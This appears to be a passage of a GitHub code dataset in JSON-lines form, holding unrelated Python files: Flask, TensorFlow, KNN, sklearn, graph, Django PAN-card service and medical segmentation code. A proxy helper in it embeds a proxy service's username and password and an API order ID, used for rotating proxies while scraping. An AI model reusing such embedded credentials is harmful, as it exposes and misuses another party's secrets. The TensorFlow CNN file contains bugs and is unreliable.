self.repository.save(data['name'], data['email'])\n json_data = {\n 'id': person.id,\n 'name': person.name,\n 'email': person.email\n }\n return {'person': json_data}, 201\n\n @jwt_required()\n def get(self):\n persons = self.repository.find_all()\n persons_json = []\n\n for p in persons:\n person = {\n 'id': p.id,\n 'name': p.name,\n 'email': p.email\n }\n persons_json.append(person)\n\n return {'persons': persons_json}\n\n\nclass PersonFindResource(Resource):\n\n repository = PersonRepository()\n\n def get(self, id):\n person = self.repository.find_one(id)\n\n if person == None:\n return {'data': 'not found'}\n\n person_json = {\n 'id': person.id,\n 'name': person.name,\n 'email': person.email\n }\n return {'person': person_json}, 200\n","repo_name":"DelanoDuarte/flask_react_app","sub_path":"server/resources/person_resource.py","file_name":"person_resource.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27552829350","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib import layers\n\nDATA_DIR = '/tmp/data'\n# NUM_STEPS = 5000\n\n# def model_fn(x, target, mode, params):\ndef model_fn(features, labels, mode, params):\n y_ = tf.cast(labels, tf.float32)\n x_image = tf.reshape(x_data, [-1, 28, 28, 1])\n\n # Conv layer 1\n conv1 = layers.convolution2d(x_image, 32, [5,5], activation_fn=tf.nn.relu, biases_initializer=tf.constant_initializer(0.1), weights_initializer=tf.truncated_normal_initializer(stddev=0.1))\n pool1 = layers.max_pool2d(conv1, [2,2])\n\n # Conv layer 2\n conv2 = layers.convolution2d(pool1, 64, [5,5], activation_fn=tf.nn.relu, biases_initializer=tf.constant_initializer(0.1), weights_initializer=tf.truncated_normal_initializer(stddev=0.1))\n pool2 = layers.max_pool2d(conv2, [2,2])\n\n # FC layer\n pool2_flat = tf.reshape(pool2, [-1, 7*7*64])\n fc1 = layers.fully_connected(pool2_flat, 1024, activation_fn=tf.nn.relu, biases_initializer=tf.constant_initializer(0.1), weights_initializer=tf.truncated_normal_initializer(stddev=0.1))\n fc1_drop = layers.dropout(fc1, keep_prob=params[\"dropout\"], is_training=(mode == 'train'))\n \n # Readout layer\n y_conv = layers.fully_connected(fc1_drop, 10, activation_fn=None)\n \n predictions = tf.argmax(y_conv, 1)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions={\"x\": predictions})\n\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_conv, logits=y_))\n # train_op = layers.optimize_loss(loss=cross_entropy, global_step=tf.contrib.framework.get_global_step(), learning_rate=params[\"learning_rate\"], optimizer=\"Adam\")\n train_op = layers.optimize_loss(loss=cross_entropy, global_step=tf.train.get_global_step(), learning_rate=params[\"learning_rate\"], optimizer=\"Adam\")\n eval_metric_ops = {\"rmse\": tf.metrics.root_mean_squared_error(tf.cast(labels, tf.float64), predictions)}\n return tf.estimator.EstimatorSpec(mode=mode, loss=cross_entropy, train_op=train_op, eval_metric_ops=eval_metric_ops)\n\ndata = input_data.read_data_sets(DATA_DIR, one_hot=True)\nx_data, y_data = data.train.images, np.int32(data.train.labels)\ntf.cast(x_data, tf.float32)\ntf.cast(y_data, tf.float32)\n\nmodel_params = {\"learning_rate\": 1e-4, \"dropout\": 0.5}\n\n# CNN = tf.contrib.learn.Estimator(model_fn=model_fn, params=model_params)\n# function is deprecated\nCNN = tf.estimator.Estimator(model_fn=model_fn, params=model_params)\n\nprint(\"Starting training for %s steps max\" % 5000)\n# CNN.fit(x=data.train.images, y=data.train.labels, batch_size=50, max_steps=5000)\n# change fit() to train()\n\ninput_fn = tf.estimator.inputs.numpy_input_fn({\"x\":x_data}, y_data, batch_size=50, num_epochs=None, shuffle=True)\n\n# train_input_fn = tf.estimator.inputs.numpy_input_fn({\"x\":x_data}, y:y_data, batch_size=50, num_epochs=5000, shuffle=False)\n# eval_input_fn = tf.estimator.inputs.numpy_input_fn({\"x\":x_data}, y:y_data, batch_size=50, num_epochs=None, shuffle=True)\n\nCNN.train(input_fn=input_fn, steps=5000)\n\n\ntest_acc = 0\n\nfor ii in range(5):\n batch = data.test.next_batch(2000)\n predictions = list(CNN.predict(batch[0], as_iterable=True))\n test_acc = test_acc + (np.argmax(batch[1],1) == predictions).mean()\n\nprint(test_acc / 5)\n","repo_name":"ITHelpDec/Tensorflow","sub_path":"Chapter 07/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38882509438","text":"import random\r\nfrom kNearestNeighbors import kNearestNeighbors\r\n\r\n\r\nclass CondensedKNearestNeighbors(kNearestNeighbors):\r\n \"\"\"\r\n This takes a set of training data and adds relevant samples one by one until no more are added. \r\n It then creates a kNearestNeighbors object using just those samples.\r\n \"\"\"\r\n\r\n def __init__(self, train, k=1):\r\n \"\"\"\r\n @param train The full training set to be cut down\r\n @param k=1 A k value, with the default set to 1\r\n \"\"\"\r\n\r\n samples = [] # sample Observations\r\n randomSample = train.pop(random.randint(0, len(train) - 1))\r\n samples.append(randomSample) # Choose a random starting Observation\r\n\r\n numberOfSamples = len(samples)\r\n while True: # continue until no more samples are added\r\n minSampleDistance = 99999 # set initial distance high to always improve at the beginning\r\n closestSample = None # there is no closest potential sample at the start\r\n for index, observation in enumerate(train):\r\n for sample in samples:\r\n sampleDistance = observation.calcDistance(sample)\r\n if sampleDistance < minSampleDistance:\r\n minSampleDistance = sampleDistance\r\n closestSample = sample\r\n if closestSample.classifier == observation.classifier: # do not consider for reduction, these are the same class and the closest sample will represent it\r\n continue\r\n else: # current observation is a different class from its closest sample, add this to the reduced dataset\r\n samples.append(train.pop(index))\r\n if len(samples) == numberOfSamples: # no new samples on this pass, exit the while loop\r\n break\r\n numberOfSamples = len(samples) # update the number of samples to check against the next run\r\n print(\"Number of samples selected: \" + str(len(samples)))\r\n\r\n super().__init__(samples, k) # initialize a kNearestNeigbors object with these samples as training set\r\n","repo_name":"dana-truempy/KNN-CNN","sub_path":"CondensedKNearestNeighbors.py","file_name":"CondensedKNearestNeighbors.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21543802443","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\n#%% Import\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import metrics, cross_validation\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\n#%% Merge tables into dataframe\r\ndf = pd.read_csv('MUDAC/df.csv')\r\ndf_test = pd.read_csv('MUDAC/df_test.csv')\r\n\r\ndf1 = df.filter(['HCU', 'gender', 'POS11', 'POS21', 'POS24', 'POS81', 'AGECAT', 'CONF_CAT'], axis=1).copy()\r\ndf2 = pd.get_dummies(df1, columns = ['gender']).fillna(0)\r\ndf_test1 = df.filter(['HCU', 'gender', 'POS11', 'POS21', 'POS24', 'POS81', 'AGECAT', 'CONF_CAT'], axis=1).copy()\r\ndf_test2 = pd.get_dummies(df_test1, columns = ['gender']).fillna(0)\r\n\r\nX_train = df2.iloc[:,1:]\r\ny_train = df2.iloc[:,0]\r\nX_test = df_test2.iloc[:,1:]\r\n\r\n#%% Logistic Regression\r\nlogreg = LogisticRegression()\r\nlogreg.fit(X_train, y_train)\r\npred = logreg.predict(X_test)\r\ndf_test['pred'] = pred\r\noutput = df_test.loc[df_test['pred'] == 1]\r\noutput.to_csv('MUDAC/out.csv',sep=',')\r\n\r\npredicted = cross_validation.cross_val_predict(logreg, X_train, y_train, cv=10)\r\nprint (accuracy_score(y_train, predicted))\r\n#print (metrics.classification_report(y, predicted))\r\n\r\n#%% Random Forest\r\nrandom_forest = RandomForestClassifier(n_estimators=100)\r\nrandom_forest.fit(X_train, y_train)\r\npred = random_forest.predict(X_test)\r\ndf_test['pred'] = pred\r\noutput = df_test.loc[df_test['pred'] == 1]\r\n\r\npredicted = cross_validation.cross_val_predict(random_forest, X_train, y_train, cv=10)\r\nprint (accuracy_score(y_train, predicted))\r\n","repo_name":"EchoZhaoo/DS-Project-Portfolio","sub_path":"Python/MUDAC_python.py","file_name":"MUDAC_python.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69884889128","text":"########################################################\n#\n# Representation of a Graph for adjacency metrix\n#\n########################################################\nimport numpy as np\n\nfrom implementation.base_graph import Graph\n\n\nclass AdjacencyMatrixGraph(Graph):\n\n def __init__(self, numVertices, directed=False):\n super(AdjacencyMatrixGraph, self).__init__(numVertices, directed)\n self.matrix = np.zeros((numVertices, numVertices))\n\n def add_edge(self, v1, v2, weight=1):\n if v1 >= self.numVertices or v2 >= self.numVertices or v1 < 0 or v2 < 0:\n raise ValueError('Vertices %d and %d are out of bounds' % (v1, v2))\n\n if weight < 1:\n raise ValueError('An edge cannot have weight < 1')\n\n self.matrix[v1][v2] = weight\n\n if self.directed == False:\n self.matrix[v2][v1] = weight\n\n def get_adjacent_vertices(self, v):\n self.check_valid_vartices(v)\n\n adjacent_vertices = []\n for i in range(self.numVertices):\n if self.matrix[v][i] > 0:\n adjacent_vertices.append(i)\n\n return adjacent_vertices\n\n def get_indegree(self, v):\n self.check_valid_vartices(v)\n\n in_degree = 0\n for i in range(self.numVertices):\n if self.matrix[i][v] > 0:\n in_degree += 1\n\n return in_degree\n\n def get_edge_weight(self, v1, v2):\n return self.matrix[v1][v2]\n\n def display(self):\n for i in range(self.numVertices):\n for v in self.get_adjacent_vertices(i):\n print(i, ' -----> ', v)\n\n def check_valid_vartices(self, v):\n if v < 0 or v >= self.numVertices:\n raise ValueError('Cannot access vertices %d' % v)\n","repo_name":"e-liyai/Graphs_in_Python","sub_path":"implementation/adjacency_matrix_graph/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5431092492","text":"import numpy as np\nimport matplotlib.pyplot as plt\n \nx = np.arange(1,11)\ny1 = x**2\ny2 = x**3\ny3 = x**4\n\nplt.plot(y1, 'o', y2, '^', y3, 'bs')\nplt.legend(['y1', 'y2','y3'], loc = 'upper left')\nplt.title('Values', fontsize = 20)\nplt.xlabel('X', fontsize = 15)\nplt.ylabel('Y', fontsize = 15)\nplt.grid(linestyle = '--', alpha = 0.8, color = 'red')\nplt.show()","repo_name":"Bosh-Kuo/Udemy-Bootcamp-of-Data-Science-with-Python","sub_path":"Section8_Matplotlib/Ex8_9.py","file_name":"Ex8_9.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73886282087","text":"def Alisa():\n koloda = []\n for i in range(1, 11):\n suit = ['worms', 'bubi', 'blame', 'cross']\n for j in range(4):\n card = str(i) + \" \" + suit[j]\n koloda.append(card)\n print(koloda)\n\nAlisa()","repo_name":"AlexAntipin/Cryptographic_Protocols","sub_path":"5 задание/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12882543131","text":"from django.shortcuts import render, HttpResponse\nfrom rest_framework.views import View\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .forms import *\nfrom accounts.views import AccountView,TransactionsView\nfrom services.views import ServiceView\nfrom utils.common import low_balance_err\nfrom .models import Panfind, Panpdf, Allpanpdf\nfrom utils.services_api import aadhar_to_pan_api\nfrom django.db import transaction\nfrom admin_services.models import InstantPanTransactions\n\nclass InstantPanFindView(LoginRequiredMixin, View):\n def get(self, request):\n form = InstantPanFindForm()\n service = ServiceView().get_service_by_id('INSTANT_PAN_FIND')\n return render(request, 'services/pan/instant_pan_find.html', context={'title': 'Instant Find Pan', 'form': form, 'service': service})\n\n def post(self, request):\n form = InstantPanFindForm(request.POST) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('INSTANT_PAN_FIND')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n with transaction.atomic():\n sp1 = transaction.savepoint()\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n data=form.save()\n res=aadhar_to_pan_api(request,form.instance.aadhar_no,data.id)\n if res.get('pan_no'):\n data.pan_no=res['pan_no']\n data.save()\n AccountView().debit_money(request, service.charge)\n InstantPanTransactions.create_or_update_transaction()\n request.msg = \"Pan no. found check list!\"\n transaction.savepoint_commit(sp1)\n elif res.get('status') and res['status']==\"Fail to Login\":\n request.err = \"Wrong data submitted!\"\n transaction.savepoint_rollback(sp1)\n else:\n request.err = res['message']\n transaction.savepoint_rollback(sp1)\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n\nclass NsdlPanFindView(LoginRequiredMixin, View):\n def get(self, request):\n form = PanFindForm()\n service = ServiceView().get_service_by_id('PAN_FIND')\n return render(request, 'services/pan/pan_find.html', context={'title': 'Find Pan', 'form': form, 'service': service})\n\n def post(self, request):\n form = PanFindForm(request.POST) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('PAN_FIND')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n AccountView().debit_money(request, service.charge)\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n form.save() # saving the data\n request.msg = \"Successfully submitted!\"\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n \n\nclass AllpanpdfView(LoginRequiredMixin, View):\n def get(self, request):\n form = AllpanpdfForm()\n service = ServiceView().get_service_by_id('UTI_PAN_PDF')\n return render(request, 'services/pan/uti_pan_pdf.html', context={'title': 'UTI PAN PDF', 'form': form, 'service': service})\n\n def post(self, request):\n form = AllpanpdfForm(request.POST,request.FILES) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('UTI_PAN_PDF')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n AccountView().debit_money(request, service.charge)\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n form.save() # saving the data\n request.msg = \"Successfully submitted!\"\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n\n\nclass PanPdfView(LoginRequiredMixin, View):\n def get(self, request):\n form = PanPdfForm()\n service = ServiceView().get_service_by_id('PAN_PDF')\n return render(request, 'services/pan/pan_pdf.html', context={'title': 'Pdf Pan', 'form': form, 'service': service})\n\n def post(self, request):\n form = PanPdfForm(request.POST) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('PAN_PDF')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n AccountView().debit_money(request, service.charge)\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n form.save() # saving the data\n request.msg = \"Successfully submitted!\"\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n\n\nclass NsdlPanFindRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = Panfind.objects.filter(account=ac)\n context = {\n 'title': 'Find Record',\n 'records': records,\n 'table_title': 'PAN Number Find Record'\n }\n return render(request, 'services/pan/pan_records.html', context=context)\n\n\nclass PanPdfRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = Panpdf.objects.filter(account=ac)\n context = {\n 'title': 'PDF Record',\n 'records': records,\n 'table_title': 'Pancard PDF Record'\n }\n return render(request, 'services/pan/pdf_records.html', context=context)\n \n\nclass AllpanpdfRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = Allpanpdf.objects.filter(account=ac)\n context = {\n 'title': 'All PDF Record',\n 'records': records,\n 'table_title': 'All PAN PDF Record'\n }\n return render(request, 'services/pan/uti_records.html', context=context)\n \n\nclass InstantPanRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = InstantPanfind.objects.filter(account=ac)\n context = {\n 'title': 'INSTANT PAN RECORD',\n 'records': records,\n 'table_title': 'INSTANT PAN RECORD'\n }\n return render(request, 'services/pan/instant_pan_records.html', context=context)\n","repo_name":"ofmukesh/hrservices","sub_path":"pan_service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42221851272","text":"# -*- encoding:utf8 -*-\r\nimport requests\r\nimport json\r\nimport multiprocessing\r\nimport random\r\nimport traceback\r\n\r\nimport XX.Date.DatetimeHelper as tsh\r\nimport XX.HTTP.RequestsHelper as reqh\r\nimport XX.DB.RedisHelper as RH\r\nimport redis\r\nimport requests\r\nfrom XX.Tools.Debug import *\r\n\r\n\r\n# 阿布云大代理\r\ndef getProxy(un=\"H76Z3LKO67NRN5QD\", pwd=\"272305BABB9380E1\"):\r\n # # 代理服务器------------------------------\r\n proxyHost = \"http-dyn.abuyun.com\"\r\n proxyPort = \"9020\"\r\n\r\n # 代理隧道验证信息\r\n proxyUser = un\r\n proxyPass = pwd\r\n\r\n proxyMeta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\r\n \"host\": proxyHost,\r\n \"port\": proxyPort,\r\n \"user\": proxyUser,\r\n \"pass\": proxyPass,\r\n }\r\n\r\n proxies = {\r\n \"http\": proxyMeta,\r\n \"https\": proxyMeta,\r\n }\r\n # # -----------------------------------------\r\n return proxies\r\n\r\n\r\ndef changeProxy():\r\n pass\r\n\r\n\r\ndef getTaiYangProxy(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n p = multiprocessing.Process(target=addTaiYang, args=(None,))\r\n p.daemon = True\r\n p.start()\r\n p.join()\r\n ips = r.keys()\r\n if ips:\r\n ip = random.choice(ips)\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n else:\r\n print(\"No more ip in taiyang proxy(db11)\")\r\n return None\r\n\r\n\r\ndef addTaiYang(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n url = \"http://http-api.taiyangruanjian.com/getip?num=1&type=2&pro=&city=0&yys=0&port=11&pack=13604&ts=1&ys=0&cs=0&lb=1&sb=0&pb=4&mr=0®ions=\"\r\n while True:\r\n time.sleep(1)\r\n if r.dbsize() < 3:\r\n resp = reqh.RequestsHelper.RequestUrl(url)\r\n if resp.status == 200:\r\n try:\r\n json_data = json.loads(resp.text)\r\n if json_data[\"code\"] == 0:\r\n ip = str(json_data[\"data\"][0][\"ip\"]) + \":\" + str(json_data[\"data\"][0][\"port\"])\r\n ets = int(tsh.strToTs(json_data[\"data\"][0][\"expire_time\"]) - time.time() + 1)\r\n d(\"OK \" + json_data[\"data\"][0][\"expire_time\"] + \" ====== now + \" + str(ets // 60), line1=\"===\")\r\n r.set(ip, 0, ex=ets)\r\n time.sleep(1)\r\n except:\r\n print(\"not json data\" + resp.text)\r\n traceback.print_exc()\r\n else:\r\n print(\"proxy return error\" + str(resp.text))\r\n else:\r\n break\r\n return 1\r\n\r\n\r\ndef addMivipProxy(r_cfg, api=None):\r\n conn_redis = RH.RedisHelper.getRedisConnectByCfg(r_cfg)\r\n while 1:\r\n if conn_redis.dbsize() < 50:\r\n try:\r\n req = requests.get(api, timeout=5)\r\n if req.status_code == 200:\r\n json_data = json.loads(req.text)\r\n ips = json_data.get(\"result\")\r\n if ips:\r\n for ip in ips:\r\n conn_redis.set(ip[\"ip:port\"], 0, ip[\"time_avail\"])\r\n print(\"Add proxy\" + str(ip[\"ip:port\"]))\r\n else:\r\n print(\"No ip\" + req.text)\r\n else:\r\n print(req.status_code)\r\n except:\r\n traceback.print_exc()\r\n else:\r\n print(\"Too Much proxy\")\r\n time.sleep(10)\r\n\r\n\r\ndef getZhimaProxy(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n # p = multiprocessing.Process(target=addZhima, args=(None,))\r\n # p.daemon = True\r\n # p.start()\r\n # p.join()\r\n ips = r.keys()\r\n if ips:\r\n ip = random.choice(ips)\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n else:\r\n print(\"No more ip in taiyang proxy(db11)\")\r\n return None\r\n\r\n\r\ndef addZhima(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n url = \"http://webapi.http.zhimacangku.com/getip?num=1&type=2&pro=&city=0&yys=0&port=1&pack=15624&ts=1&ys=0&cs=0&lb=1&sb=0&pb=4&mr=1®ions=\"\r\n while True:\r\n time.sleep(1)\r\n if r.dbsize() < 2:\r\n resp = reqh.RequestsHelper.RequestUrl(url)\r\n if resp.status == 200:\r\n try:\r\n json_data = json.loads(resp.text)\r\n if json_data[\"code\"] == 0:\r\n ip = str(json_data[\"data\"][0][\"ip\"]) + \":\" + str(json_data[\"data\"][0][\"port\"])\r\n ets = int(tsh.strToTs(json_data[\"data\"][0][\"expire_time\"]) - time.time() + 1)\r\n d(\"OK \" + json_data[\"data\"][0][\"expire_time\"] + \" ====== now + \" + str(ets // 60), line1=\"===\")\r\n r.set(ip, 0, ex=ets)\r\n time.sleep(1)\r\n else:\r\n print(json_data)\r\n except:\r\n print(\"not json data\" + resp.text)\r\n traceback.print_exc()\r\n else:\r\n print(\"proxy return error\" + str(resp.text))\r\n else:\r\n print(\"Enough\")\r\n time.sleep(10)\r\n\r\n\r\ndef getDB11Proxy(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n ips = r.keys()\r\n if ips:\r\n ip = random.choice(ips)\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n else:\r\n print(\"No more ip in taiyang proxy(db11)\")\r\n return None\r\n\r\n\r\ndef testIP():\r\n headers = {\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\r\n \"Connection\": \"keep-alive\",\r\n \"Upgrade-Insecure-Requests\": \"1\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5005.400 QQBrowser/10.0.923.400\"\r\n }\r\n while 1:\r\n PROXIES = getZhimaProxy()\r\n if PROXIES:\r\n urls = []\r\n urls.append(\"https://www.baidu.com/?tn=98010089_dg\")\r\n urls.append(\"http://www.qichacha.com/\")\r\n urls.append(\"http://www.gsxt.gov.cn/index.html\")\r\n urls.append(\"https: // www.csdn.net /\")\r\n for url in urls:\r\n try:\r\n req = requests.get(url, proxies=PROXIES, timeout=5, headers=headers)\r\n print(req.status_code)\r\n time.sleep(1)\r\n except:\r\n print(\"time out\" + url)\r\n else:\r\n p(\" wrong proxy\", line=\"-----\")\r\n\r\n\r\ndef getProxyByIP(ip):\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import random\r\n from XX.Model.Struct.RedisConn import ali_cfg\r\n\r\n ali_cfg[\"db\"] = 9\r\n api = \"https://proxyapi.mimvp.com/api/fetchsecret.php?orderid=867050512125280583&num=50&http_type=3&result_fields=1,3&result_sort_field=2&result_format=json\"\r\n addMivipProxy(ali_cfg, api=api)\r\n exit()\r\n","repo_name":"Eddyy90/desafioAgenda","sub_path":".venv/lib/python3.8/site-packages/XX/Tools/Proxy.py","file_name":"Proxy.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"934184584","text":"import logging\nimport random\nimport sys\nimport time\n\nimport numpy as np\nimport torch\nfrom pathlib import Path\nfrom tensorboardX import SummaryWriter\nfrom torch import nn as nn, optim as optim\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\n\nfrom dataset.pancreas import Pancreas, PancreasSTDataset\nfrom resnet18_3d import AHNet\nfrom utils1 import statistic\nfrom vnet import VNet\n\n\ndef to_cuda(tensors, device=None):\n res = []\n if isinstance(tensors, (list, tuple)):\n for t in tensors:\n res.append(to_cuda(t, device))\n return res\n elif isinstance(tensors, (dict,)):\n res = {}\n for k, v in tensors.items():\n res[k] = to_cuda(v, device)\n return res\n else:\n if isinstance(tensors, torch.Tensor):\n if device is None:\n return tensors.cuda()\n else:\n return tensors.to(device)\n else:\n return tensors\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n return self\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val\n self.count += n\n self.avg = self.sum / self.count\n return self\n\n\ndef set_random_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n\ndef get_current_consistency_weight(current, rampup_length):\n \"\"\"Exponential rampup from https://arxiv.org/abs/1610.02242\"\"\"\n if rampup_length == 0:\n return 1.0\n else:\n current = np.clip(current, 0.0, rampup_length)\n phase = 1.0 - current / rampup_length\n return float(np.exp(-5.0 * phase * phase))\n\n\n@torch.no_grad()\ndef update_ema_variables(model, ema_model, alpha):\n for ema_param, param in zip(ema_model.parameters(), model.parameters()):\n ema_param.data.mul_(alpha).add_((1 - alpha) * param.data)\n\n\ndef create_model(res18=False, ema=False):\n net = AHNet() if res18 else VNet()\n net = nn.DataParallel(net)\n model = net.cuda()\n if ema:\n for param in model.parameters():\n param.detach_()\n return model\n\n\ndef get_model_and_dataloader(data_root, split_name, batch_size, lr, res18=False):\n print(\"Initialize network, optimizer and datasets...\")\n \"\"\"Net & optimizer\"\"\"\n net = create_model(res18)\n ema_net = create_model(res18, ema=True).cuda()\n optimizer = optim.Adam(net.parameters(), lr=lr, betas=(0.5, 0.999))\n\n trainset_lab = Pancreas(data_root, split_name, split='train_lab')\n lab_loader = DataLoader(trainset_lab, batch_size=batch_size, shuffle=False, num_workers=0)\n\n trainset_unlab = Pancreas(data_root, split_name, split='train_unlab', no_crop=True)\n unlab_loader = DataLoader(trainset_unlab, batch_size=1, shuffle=False, num_workers=0)\n\n testset = Pancreas(data_root, split_name, split='test')\n test_loader = DataLoader(testset, batch_size=1, shuffle=False, num_workers=0)\n return net, ema_net, optimizer, lab_loader, unlab_loader, test_loader\n\n\ndef save_net_opt(net, optimizer, path, epoch):\n state = {\n 'net': net.state_dict(),\n 'opt': optimizer.state_dict(),\n 'epoch': epoch,\n }\n torch.save(state, str(path))\n\n\ndef load_net_opt(net, optimizer, path):\n state = torch.load(str(path))\n ret = net.load_state_dict(state['net'])\n print(ret)\n optimizer.load_state_dict(state['opt'])\n\n\ndef count_param(model):\n param_count = 0\n for param in model.parameters():\n param_count += param.view(-1).size()[0]\n return param_count\n\n\ndef get_mask(out, thres=0.5):\n probs = F.softmax(out, 1)\n masks = (probs >= thres).float()\n masks = masks[:, 1, :, :].contiguous()\n return masks\n\n\n@torch.no_grad()\ndef pred_unlabel(net, pred_loader, batch_size):\n unimg, unlab, unmask, labs = [], [], [], []\n plab_dice = 0\n for (step, data) in enumerate(pred_loader):\n img, lab = data\n img, lab = img.cuda(), lab.cuda()\n out = net(img)\n plab0 = get_mask(out[0])\n plab1 = get_mask(out[1])\n plab2 = get_mask(out[2])\n\n mask = (plab1 == plab2).long()\n plab = plab0\n unimg.append(img)\n unlab.append(plab)\n unmask.append(mask)\n labs.append(lab)\n\n plab_dice += statistic.dice_ratio(plab, lab)\n plab_dice /= len(pred_loader)\n new_loader = DataLoader(PancreasSTDataset(unimg, unlab, unmask, labs), batch_size=batch_size, shuffle=True, num_workers=0, drop_last=True)\n return new_loader, plab_dice\n\n\ndef config_log(save_path, tensorboard=False):\n writer = SummaryWriter(str(save_path), filename_suffix=time.strftime('_%Y-%m-%d_%H-%M-%S')) if tensorboard else None\n\n save_path = str(Path(save_path) / 'log.txt')\n formatter = logging.Formatter('%(levelname)s [%(asctime)s] %(message)s')\n\n logger = logging.getLogger(save_path.split('/')[-2])\n logger.setLevel(logging.INFO)\n\n handler = logging.FileHandler(save_path)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n sh = logging.StreamHandler(sys.stdout)\n handler.setFormatter(formatter)\n logger.addHandler(sh)\n\n return logger, writer\n\n\nclass Measures():\n def __init__(self, keys, writer, logger):\n self.keys = keys\n self.measures = {k: AverageMeter() for k in self.keys}\n self.writer = writer\n self.logger = logger\n\n def reset(self):\n [v.reset() for v in self.measures.values()]\n\n\nclass PretrainMeasures(Measures):\n def __init__(self, writer, logger):\n keys = ['loss_ce', 'loss_dice', 'loss_con', 'loss_rad', 'loss_all', 'train_dice']\n super(PretrainMeasures, self).__init__(keys, writer, logger)\n\n def update(self, out, lab, *args):\n args = list(args)\n masks = get_mask(out)\n train_dice = statistic.dice_ratio(masks, lab)\n 